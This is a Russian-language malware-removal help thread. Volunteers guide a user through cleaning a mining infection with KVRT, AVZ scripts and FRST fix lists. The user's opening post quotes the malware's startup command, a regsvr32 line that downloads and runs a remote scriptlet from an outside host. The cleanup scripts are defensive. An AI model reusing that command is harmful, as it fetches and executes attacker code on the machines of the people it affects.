Решена Mysa\Mysa1\Mysa2\Mysa3\ok

Статус
В этой теме нельзя размещать новые ответы.

smoked

Новый пользователь
Сообщения
9
Реакции
0
Здравствуйте. Помогите удалить вирусы, пжл.
В планировщике заданий Mysa, Mysa1, Mysa2, Mysa3 и ok. В автозагрузке "start" командная строка - regsvr32 /u /s /i:htt://js.1226bye.xyz:280/v.sct scrobj.dll.
Утилита Dr.Web CureIt! их видит, но удалить не может, каждый раз после рестарта появляются вновь.
Mozilla Firefox открывает рекламные страницы-удалил. Антивирус не запускается.
 

Вложения

  • CollectionLog-2019.03.02-21.36.zip
    90.7 KB · Просмотры: 4
  • Screenshot_3.png
    Screenshot_3.png
    44.7 KB · Просмотры: 98
  • Screenshot_4.png
    Screenshot_4.png
    77.1 KB · Просмотры: 76
  • Screenshot_22.png
    Screenshot_22.png
    17.5 KB · Просмотры: 89
  • Screenshot_2.png
    Screenshot_2.png
    53.2 KB · Просмотры: 93
Последнее редактирование модератором:
  1. Скачайте утилиту на рабочий стол.
  2. Запустите KVRT и подтвердите согласие с условиями использования
  3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
  4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
  5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
  6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме
 
Выполнил проверку утилитой KVRT 2 раза
Свежий лог AutoLogger
 

Вложения

  • report_20190302_231906.klr.zip
    1.9 KB · Просмотры: 3
  • report_20190303_010630.klr.zip
    588 байт · Просмотры: 2
  • CollectionLog-2019.03.03-02.49.zip
    87 KB · Просмотры: 3
Последнее редактирование:
Advanced SystemCare - рекомендую деинсталлировать

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 StopService('46e7835060b31c92');
 StopService('46e7836c5e0b6392');
 QuarantineFile('C:\Users\user\AppData\Local\Temp\dec9f07.sys', '');
 QuarantineFile('C:\Users\user\AppData\Local\Temp\ef1921a.sys', '');
 DeleteFile('C:\Users\user\AppData\Local\Temp\dec9f07.sys', '64');
 DeleteFile('C:\Users\user\AppData\Local\Temp\ef1921a.sys', '64');
 DeleteService('46e7835060b31c92');
 DeleteService('46e7836c5e0b6392');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
RebootWindows(true);
end.

Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O22 - Task: {6309D3C4-C7F1-4F23-BF0F-97F0138057F9} - I:\AutoRun.exe (file missing)

Что сейчас с проблемой?
 
подскажите как правильно удалить программу Advanced SystemCare, если я не вижу её в разделе "Программы и компоненты" (скрин2). Удалить файлы на скрине3?
 

Вложения

  • Screenshot_2.png
    Screenshot_2.png
    50 KB · Просмотры: 75
  • Screenshot_3.png
    Screenshot_3.png
    38 KB · Просмотры: 62
Удалите через uninstall tools или вручную запустить файл деинсталлятора в папке с программой (Program Files (x86))
 
+
Если не получится, воспользуйтесь Geek Uninstaller
 
Файл quarantine.zip из папки с распакованной утилитой AVZ отправил на почтовый ящик. "Профиксил" в HijackThis строку. Уже после сканирования и лечения утилитой KVRT Mysa\ok\lsmose.exe\conhost.exe\upsupx.exe\64.exe замечены не были. Спасибо.
В Geek Uninstaller, uninstall tools, ccleaner, Revo Uninstaller программу Advanced SystemCare не вижу. Папку с деинсталлятором C:\Program Files (x86) найти не получается.
 

Вложения

  • Screenshot_6.png
    Screenshot_6.png
    86.6 KB · Просмотры: 76
  • Screenshot_4.png
    Screenshot_4.png
    21.4 KB · Просмотры: 68
  • Screenshot_5.png
    Screenshot_5.png
    34.7 KB · Просмотры: 76
  • Revo Uninstaller.png
    Revo Uninstaller.png
    145.5 KB · Просмотры: 74
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 
Сканирование утилитой Farbar Recovery Scan Tool выполнил. Отчеты FRST.txt, Addition.txt, Shortcut.txt прикрепил.
 

Вложения

  • Addition.txt
    50.8 KB · Просмотры: 1
  • FRST.txt
    172.8 KB · Просмотры: 1
  • Shortcut.txt
    119.9 KB · Просмотры: 0
  • Screenshot_7.png
    Screenshot_7.png
    85.7 KB · Просмотры: 72
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    HKU\S-1-5-21-4090549133-174321171-612158434-1000\...\MountPoints2: F - F:\AutoRun.exe
    HKU\S-1-5-21-4090549133-174321171-612158434-1000\...\MountPoints2: G - G:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-4090549133-174321171-612158434-1000\...\MountPoints2: {49bbf2cd-2172-11e4-a555-806e6f6e6963} - G:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-4090549133-174321171-612158434-1000\...\MountPoints2: {76267fc7-0ef0-11e1-9a00-806e6f6e6963} - E:\DistinguishOS.exe
    HKU\S-1-5-21-4090549133-174321171-612158434-1000\...\MountPoints2: {96b42578-0f0f-11e1-a76f-9439e5688998} - G:\AutoRun.exe
    HKU\S-1-5-21-4090549133-174321171-612158434-1000\...\MountPoints2: {a87bd432-de89-11e3-a2a2-b870f4f8d005} - G:\HTC_Sync_Manager_PC.exe
    CHR HKU\S-1-5-21-4090549133-174321171-612158434-1000\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    GroupPolicy: Restriction - Chrome <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    CHR HKU\S-1-5-21-4090549133-174321171-612158434-1000\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    S2 HPSLPSVC; C:\Users\user\AppData\Local\Temp\7zS10A9\hpslpsvc64.dll [X] <==== ATTENTION
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} =>  -> No File
    ContextMenuHandlers1: [MRACMenu] -> {B495CAFE-D53F-408B-A081-0814BE80EB3E} =>  -> No File
    Task: {081D8F34-6A10-4BA1-895A-A44EEFADDB9A} - System32\Tasks\ASC8_SkipUac_user => C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASC.exe
     C:\Program Files (x86)\IObit\
    Task: {B7F0116C-7ED7-47F9-B584-88B9559018D3} - \AVAST Software\Avast settings backup -> No File <==== ATTENTION
    AlternateDataStreams: C:\ProgramData\Temp:1A15E356 [235]
    AlternateDataStreams: C:\ProgramData\Temp:1B389835 [230]
    AlternateDataStreams: C:\ProgramData\Temp:5EFA2A20 [114]
    AlternateDataStreams: C:\ProgramData\Temp:7B9BB187 [146]
    AlternateDataStreams: C:\ProgramData\Temp:AD2DB2F9 [242]
    AlternateDataStreams: C:\ProgramData\Temp:B4258C5D [332]
    AlternateDataStreams: C:\ProgramData\Temp:C2F24DB5 [288]
    AlternateDataStreams: C:\ProgramData\Temp:E2CFA9CD [209]
    AlternateDataStreams: C:\Users\Все пользователи\Temp:1A15E356 [235]
    AlternateDataStreams: C:\Users\Все пользователи\Temp:1B389835 [230]
    AlternateDataStreams: C:\Users\Все пользователи\Temp:5EFA2A20 [114]
    AlternateDataStreams: C:\Users\Все пользователи\Temp:7B9BB187 [146]
    AlternateDataStreams: C:\Users\Все пользователи\Temp:AD2DB2F9 [242]
    AlternateDataStreams: C:\Users\Все пользователи\Temp:B4258C5D [332]
    AlternateDataStreams: C:\Users\Все пользователи\Temp:C2F24DB5 [288]
    AlternateDataStreams: C:\Users\Все пользователи\Temp:E2CFA9CD [209]
    FirewallRules: [{7DE1359A-A930-4899-B4EF-DDB154869C10}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{2A016E5C-F63A-4AED-A0E4-A1AA9DF83E36}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{72D0579D-A81F-4852-808E-6F1E1A1DE50E}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{A8E39927-3E32-4306-B455-05323FD3BB5F}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{E26FE8ED-3317-4FD4-8EFD-7CB6BDB0BF7D}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{6A6F3922-3A33-44CD-9F79-205390EDAF00}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{AFA6267A-47DD-4D0C-BD81-189779AE3E26}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{077FBA98-916E-4B05-A960-674B4FC349C6}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{1DB7D795-CE64-40A9-860D-AE0624C9F4E1}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{232C751E-965E-467D-B95C-5100CF8D551E}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{5DD68A10-CA5E-4413-B23D-E5DB92B0298A}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{28DC4DDA-FC5F-4E6C-AA7F-B80C759B52FF}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{998768E3-B51E-461C-92B0-23F5BA5D30F4}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{479E427F-7501-4382-9D77-9D1749962E2A}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{D7BC196C-3038-4DA6-924E-3775C1C61D00}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{4BCC465D-3CC6-47B3-B299-3DE1350B4E77}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{047D3C2B-D275-4862-98F4-DE56A22A41ED}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{12D1962B-6BD0-4FA7-B443-7BDD8CE5DB7E}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{137BF6F6-2537-4F73-8944-D44F29FFCE06}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{876C0D32-986F-46FE-96D3-A826FBA36238}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{5E9F2392-00E1-43D3-AC3F-C4E90424789C}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{07B22D24-95A8-44F0-8E72-2CC656FAC3BA}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{202C7C08-7C7C-4B99-9265-52701FB9BFF4}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{41A3A3B9-7762-45AB-90A5-3D2870FCECA1}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{D5022B07-BC38-4965-9BD0-3184A8A923EC}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{75447963-DFA1-4124-888A-D11BA0A92A3F}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{720F22D0-5E7A-42D6-88B9-5E6ECC1E5ADD}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{0E744372-922B-4952-8023-1BA3A0363508}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{F3B13840-1EE7-4983-B4B2-0CBE40F77878}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{FA399B6F-2DD7-489D-A109-CD8328973C45}] => (Allow) D:\Загрузки\utorrent182\utorrent182.exe No File
    FirewallRules: [{5C7FACDD-68FB-4AB6-8613-877681A7D9FA}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{E64EFAB3-EE8C-4A7C-A893-AF938B1FC573}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{C2E4DA06-B1F5-4F24-8A08-D406B49D1980}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{A0118FEE-9F6E-4FBB-ABC4-20587674BBAF}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{9ED63FCE-51F5-4E41-B34F-93198EB95FE9}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{804186DC-8233-4FDB-9A09-EB38ECA37BC1}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{F232D6B7-0464-440D-B4CD-9DE1ABADAC25}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{EF648721-7C67-473C-9C62-23E26B0C7637}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{49587578-CDFF-4BCE-A638-24D01A9BE6E5}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    FirewallRules: [{318D5BF9-68A6-41AC-8CD3-C3C916D831A1}] => (Allow) D:\Загрузки\Test_182\Test uTorrent 1.8.2\uTorrent.exe No File
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

SpyHunter - уже удалили?
 
SpyHunter удалил из планировщика заданий и в утилите Revo Uninstaller его нет. Skype Click to Call принудительно удалил утилитой Revo. В планировщике нашел Advanced SystemCare (скрин). Удалить?
 

Вложения

  • ASC.png
    ASC.png
    80.7 KB · Просмотры: 65
Я его скриптом удаляю в месте с папкой + мусор.
 
В FRST64 выше указанный код выполнил. Лог-файл (Fixlog.txt) прикрепил.
 

Вложения

  • Fixlog.txt
    19.9 KB · Просмотры: 1
Если проблем больше нет, то финализируем

Подготовьте лог SecurityCheck by glax24

Ознакомьтесь: Рекомендации после лечения

Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
  1. Запустите AVZ.
  2. Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  3. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  4. Закачайте полученный архив, как описано на этой странице.
  5. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.
 
ZIP архив с именем virusinfo_auto_USER-ПК закачал.
Прикрепил лог SecurityCheck by glax24.
При повторном сканировании утилитой KVRT никто не обнаружен. ПК стал работать шустрее.
Avast находит в программах замедляющих работу ПК прогу TODO (скрин). Это "хорошая" программа?
Не удаётся создать точку восстановления (скрин). Подскажите, пжл, как исправить.
Проги µTorrent и Orbitum не удалил. Критично?
После установки обновлений уменьшается свободное место на диске С. Запускаю очистку + системные. Очищаю подпапки Download и DataStore\Logs. Нужно, наверно, увеличить размер системного раздела ( С общ. 48,8 ГБ свободно 5,93ГБ)?
Спасибо.
 

Вложения

  • SecurityCheck.txt
    7.8 KB · Просмотры: 2
  • Screenshot_1.png
    Screenshot_1.png
    16.2 KB · Просмотры: 86
  • ствс.png
    ствс.png
    145.4 KB · Просмотры: 68
Последнее редактирование:
Нужно, наверно, увеличить размер системного раздела
Хорошо бы увеличить. Как это сделать знаете? Проблема с созданием контрольной точки вероятно с этим и связана.

Про µTorrent только уведомление. Orbitum советуем всё же удалить.
 
Orbitum удалю.
О увеличении буду читать в теме "Как увеличить размер системного диска средствами Windows?". До какого объёма следует увеличить диск С?
Если Вас не затруднит, объясните мне двух словах по-простому: что делали вирусы на уже "не моём ПК"? Нужно ли менять пароли?
Можно сделать резервную копию на USB-носитель? Какую программу посоветуете? Тему "Программы резервного копирования" читаю.
43000
 
До какого объёма следует увеличить диск С?
Должно быть ~20% свободного пространства, больше лучше (в разумных пределах)
сли Вас не затруднит, объясните мне двух словах по-простому: что делали вирусы на уже "не моём ПК"?
Использовали мощности для майнинга. Пароли все равно лучше сменить.


Можно сделать резервную копию на USB-носитель?
Любой внешний носитель подойдет достаточного размера.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу